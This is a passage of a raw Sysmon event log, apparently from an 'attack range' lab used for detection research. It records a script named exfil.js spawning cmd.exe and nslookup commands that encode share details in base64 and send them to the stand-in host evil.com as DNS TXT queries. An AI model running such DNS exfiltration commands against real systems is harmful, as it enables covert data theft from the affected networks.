:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.216{2E1864BB-18EF-629A-2944-000000005F02}7948C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfbd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.197{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllhqy.tmpMD5=FFC3044AFB570E80F372BF53DBBB8207,SHA256=F6E14FFAF6210075EB5936267DAFDA62885E6C7751665C0CB6BEB4993231BC98,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.181{2E1864BB-18EF-629A-2744-000000005F02}66727328C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-2844-000000005F02}4860C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.181{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-2844-000000005F02}4860C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.181{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.181{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.181{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.181{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.181{2E1864BB-18EF-629A-2644-000000005F02}29525044C:\Windows\system32\cmd.exe{2E1864BB-18EF-629A-2844-000000005F02}4860C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.183{2E1864BB-18EF-629A-2844-000000005F02}4860C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EF-629A-2644-000000005F02}2952C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllhqy.tmp 2>&1 10341000x8000000000000000210242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.159{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-2744-000000005F02}6672C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.159{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-2744-000000005F02}6672C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.159{2E1864BB-18EF-629A-2744-000000005F02}66727328C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-2644-000000005F02}2952C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.144{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-2744-000000005F02}6672C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.144{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.144{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.144{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.144{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.144{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-2644-000000005F02}2952C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.144{2E1864BB-18E0-629A-6742-000000005F02}39765992C:\Windows\System32\WScript.exe{2E1864BB-18EF-629A-2644-000000005F02}2952C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.147{2E1864BB-18EF-629A-2644-000000005F02}2952C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllhqy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.128{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnrc.tmpMD5=D1A54A6F21A90F6B3FDD9CFE56E9C930,SHA256=5C5F1828A4B86FD4EE344674F6FC0762ED42C1A295A6FDEB230A8253C2750995,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000210230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.649{00000000-0000-0000-0000-000000000000}3736<unknown process>-udpfalsefalse127.0.0.1-50787-false127.0.0.1-53domain 354300x8000000000000000210229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.649{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50787- 354300x8000000000000000210228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.649{00000000-0000-0000-0000-000000000000}3736<unknown process>-udptruefalse127.0.0.1-50787-false127.0.0.1-53domain 354300x8000000000000000210227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.649{00000000-0000-0000-0000-000000000000}3736<unknown process>-udpfalsefalse127.0.0.1-50786-false127.0.0.1-53domain 354300x8000000000000000210226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.649{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50786- 354300x8000000000000000210225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.649{00000000-0000-0000-0000-000000000000}3736<unknown process>-udpfalsefalse127.0.0.1-50785-false127.0.0.1-53domain 354300x8000000000000000210224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.649{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50785- 354300x8000000000000000210223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.649{00000000-0000-0000-0000-000000000000}3736<unknown process>-udptruefalse127.0.0.1-50785-false127.0.0.1-53domain 354300x8000000000000000210222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.585{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50784- 354300x8000000000000000210221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.585{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50783- 354300x8000000000000000210220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.585{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50782- 354300x8000000000000000210219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.515{00000000-0000-0000-0000-000000000000}7556<unknown process>-udpfalsefalse127.0.0.1-50781-false127.0.0.1-53domain 354300x8000000000000000210218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.515{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50781- 354300x8000000000000000210217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.515{00000000-0000-0000-0000-000000000000}7556<unknown process>-udptruefalse127.0.0.1-50781-false127.0.0.1-53domain 354300x8000000000000000210216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.515{00000000-0000-0000-0000-000000000000}7556<unknown process>-udpfalsefalse127.0.0.1-50780-false127.0.0.1-53domain 354300x8000000000000000210215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.515{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50780- 354300x8000000000000000210214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.515{00000000-0000-0000-0000-000000000000}7556<unknown process>-udptruefalse127.0.0.1-50780-false127.0.0.1-53domain 354300x8000000000000000210213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.514{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50779- 354300x8000000000000000210212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.514{00000000-0000-0000-0000-000000000000}7556<unknown process>-udptruefalse127.0.0.1-50779-false127.0.0.1-53domain 354300x8000000000000000210211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.227{00000000-0000-0000-0000-000000000000}4128<unknown process>-udpfalsefalse127.0.0.1-50778-false127.0.0.1-53domain 354300x8000000000000000210210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.227{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50778- 354300x8000000000000000210209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.227{00000000-0000-0000-0000-000000000000}4128<unknown process>-udptruefalse127.0.0.1-50778-false127.0.0.1-53domain 354300x8000000000000000210208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.226{00000000-0000-0000-0000-000000000000}4128<unknown process>-udpfalsefalse127.0.0.1-50777-false127.0.0.1-53domain 354300x8000000000000000210207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.226{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50777- 354300x8000000000000000210206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.226{00000000-0000-0000-0000-000000000000}4128<unknown process>-udptruefalse127.0.0.1-50777-false127.0.0.1-53domain 354300x8000000000000000210205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.226{00000000-0000-0000-0000-000000000000}4128<unknown process>-udpfalsefalse127.0.0.1-50776-false127.0.0.1-53domain 354300x8000000000000000210204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.226{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50776- 354300x8000000000000000210203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.226{00000000-0000-0000-0000-000000000000}4128<unknown process>-udptruefalse127.0.0.1-50776-false127.0.0.1-53domain 354300x8000000000000000210202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.139{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50775- 354300x8000000000000000210201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.139{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50774- 354300x8000000000000000210200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.139{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50773- 354300x8000000000000000210199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.139{00000000-0000-0000-0000-000000000000}7604<unknown process>-udptruefalse127.0.0.1-50773-false127.0.0.1-53domain 354300x8000000000000000210198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.053{00000000-0000-0000-0000-000000000000}8020<unknown 